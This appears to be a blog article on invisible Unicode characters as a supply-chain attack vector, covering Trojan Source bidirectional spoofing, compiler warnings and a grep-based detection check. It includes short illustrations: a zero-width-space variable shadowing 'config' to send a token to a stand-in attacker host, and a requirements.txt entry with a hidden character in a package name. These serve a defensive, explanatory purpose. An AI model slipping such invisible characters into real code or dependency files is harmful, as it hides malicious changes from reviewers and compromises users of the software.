· 6 min read ·

Invisible Unicode Characters Are a Supply-Chain Attack Vector and Most Repositories Are Not Checking

Source: lobsters

A supply-chain attack documented by Ars Technica this week exploited invisible Unicode characters embedded in source code to smuggle malicious payloads past code review across GitHub and several other package repositories. The technique is not new; the underlying mechanics have been understood for years. That is precisely why its use in an active supply-chain campaign is worth examining in detail.

The Unicode Characters That Produce No Glyph

Unicode defines over 140,000 characters. A meaningful subset produce no visible glyph, control bidirectional text flow, or modify how adjacent characters combine without themselves rendering. In document processing, these serve legitimate functions. Bidirectional control characters handle the mixing of right-to-left scripts like Arabic and Hebrew with left-to-right Latin text. Zero-width joiners and non-joiners govern how characters in Devanagari or emoji sequences combine. The byte-order mark signals encoding at the start of a file.

Programming language parsers and compilers accept these characters in most contexts. String literals can contain any Unicode character. Identifiers in Python 3, JavaScript, Rust, and Go permit Unicode letters and, in some implementations, Unicode formatting characters. The result is a persistent gap between what a human reviewer sees rendered in a browser and what the compiler or interpreter processes.

Trojan Source and the Bidirectional Spoof

The canonical technical treatment of this attack class appeared in a 2021 paper by Nicholas Boucher and Ross Anderson at the University of Cambridge, catalogued as CVE-2021-42574. They demonstrated that Unicode bidirectional control characters, specifically those in the U+202A-U+202E and U+2066-U+2069 ranges, could be embedded inside string literals and comments to visually reorder source code in ways that make malicious logic appear benign.

The mechanism exploits how text renderers implement the Unicode Bidirectional Algorithm. When a renderer encounters a Right-to-Left Override character (U+202E), it reverses the display order of subsequent characters until a Pop Directional Formatting character (U+202C) closes the scope. The source file contains those characters in their actual byte positions; the renderer repositions them visually. The parser ignores the rendering and processes characters in file order.

The paper showed this attack works across C, C++, C#, JavaScript, Java, Python, Rust, and Go. Every language that accepts these characters in source text without rejecting them is potentially affected. A string comparison that looks correct in a diff view may use a value that includes invisible control characters, making the comparison behave differently than any reviewer would expect.

Zero-Width Characters and Identifier Shadowing

Bidirectional spoofing is one variant of this attack class. Zero-width characters introduce a distinct problem: they make two identifiers appear identical while being distinct strings.

config = {"url": "https://api.legitimate.com", "token": get_token()}
confi​g = {"url": "https://attacker.example.com", "token": get_token()}
# The second name contains U+200B (ZERO-WIDTH SPACE) between 'confi' and 'g'

A reviewer reading this diff in a browser sees two declarations of config. They are different variable names. Any code that subsequently references config may resolve to either depending on scoping and declaration order. In languages with dynamic scope or runtime variable lookup, this shadowing can be exploited silently throughout a module.

The same technique extends directly to dependency manifest files, which is where it becomes a supply-chain weapon:

# requirements.txt
requests==2.28.0
cryptography==41.0.0
boto3​==1.28.0

The third entry contains a zero-width space embedded in the package name. A package registry that does not normalize these characters before resolution treats it as a distinct package identifier. An attacker registers that name in advance with a malicious payload. The install proceeds without error; nothing in the visible diff indicates a problem.

This is not hypothetical. The npm ecosystem has a long history of typosquatting attacks where slightly-varied package names install malicious code. Invisible characters extend that attack surface from the keyboard layout into the Unicode character space, where the variation is undetectable without explicit tooling.

Why Code Review Fails at This Layer

Code review on GitHub is a visual process mediated by a browser rendering engine. Invisible characters are invisible. Bidirectional control characters actively work against the reviewer by reordering what they see. Neither visual attention nor trained intuition for suspicious code patterns applies to content that the rendering engine removes from view or repositions.

Automated tools face the same problem if they operate on the rendered or normalized text representation. AI-assisted code review tools that process the diff as displayed text will not encounter the invisible characters any more than a human reviewer does, unless they are explicitly designed to audit Unicode composition at the byte level.

CI/CD pipelines introduce another layer of exposure. GitHub Actions configurations are YAML files parsed as Unicode text. Invisible characters in shell commands within a workflow file pass into the shell interpreter verbatim. A malicious contributor with write access, or one who compromises an upstream action or reusable workflow, can inject characters that alter the behavior of CI scripts without any change appearing in a visual diff review. The injected characters might redirect a deployment target, add an outbound request, or exfiltrate environment variables, all while the workflow file appears unchanged to a reviewer.

Compiler and Toolchain Responses

The Trojan Source disclosure prompted responses from several toolchains. GCC added the -Wbidi-chars warning flag, which reports bidirectional control characters in source files. Clang implemented similar detection. Rust’s compiler began emitting warnings for bidirectional control characters in source code starting with Rust 1.56.1, released shortly after the disclosure. Python’s tokenizer added a SyntaxWarning for certain problematic Unicode characters in identifiers.

These responses are warnings in most configurations, not errors. A codebase that does not treat warnings as errors will compile or interpret a malicious file without failing the build. In the supply-chain context, this means the attack succeeds even in repositories that run through these compilers, as long as warning output is not monitored. Most production pipelines are not configured to fail on Unicode-related compiler warnings.

Go took a stricter approach: since Go 1.21 the compiler rejects identifiers containing Unicode control characters by default rather than warning about them. That is closer to what the problem requires, though it addresses identifiers only, not string literals.

Detection Without Waiting for the Toolchain

Auditing for invisible characters does not require specialized tools. A grep invocation with Unicode-aware patterns covers the majority of the attack surface:

grep -rP "[\u200b-\u200f\u202a-\u202e\u2060-\u206f\ufeff]" ./

This matches zero-width spaces and marks (U+200B-U+200F), bidirectional control characters (U+202A-U+202E), invisible formatting characters in the U+2060-U+206F range, and the byte-order mark when it appears mid-file. Running this as a pre-commit hook or a required CI step adds a gate that catches most of what these attacks use, with essentially no false positives in ordinary source code.

GitHub’s code scanning supports custom CodeQL queries, and community-contributed rules targeting Trojan Source variants are available. The Unicode Security Mechanisms report from the Unicode Consortium defines a set of confusable character categories and provides a basis for more comprehensive detection. The npm security team and PyPI’s malware detection pipeline have added pattern matching for suspicious Unicode in submitted packages, though coverage is not comprehensive and does not apply retroactively to existing versions.

For repositories that accept contributions from external parties, adding the grep check to the CI pipeline is a one-line addition that closes a significant portion of this attack surface. Most repositories have not done it.

The Structural Problem

The reason this attack class persists after years of awareness is that it exploits a genuine feature of a necessary standard. Blocking all Unicode formatting characters in source code would break legitimate internationalized software. The correct boundary is to reject these characters in identifier and comment positions while permitting them in string data, which requires tooling that understands syntactic context. Most security scanners do not implement that distinction.

Package registries could enforce stricter pre-publication checks, normalizing package names and rejecting uploads containing invisible characters in executable code. Language toolchains could default these warnings to errors in new projects. GitHub could surface character-level Unicode anomalies in the diff view as a visual indicator rather than rendering them transparently. The engineering for all of these exists; none of it requires research that has not already been done.

The supply-chain campaign documented this week is consistent with what security researchers predicted after the Trojan Source disclosure. The gap is known, the mitigations are available, and the attackers are using the gap while the ecosystem moves slowly toward closing it. The question for any team that maintains open source software is whether a Unicode character audit is part of their contribution review. In most cases, it is not.

Was this interesting?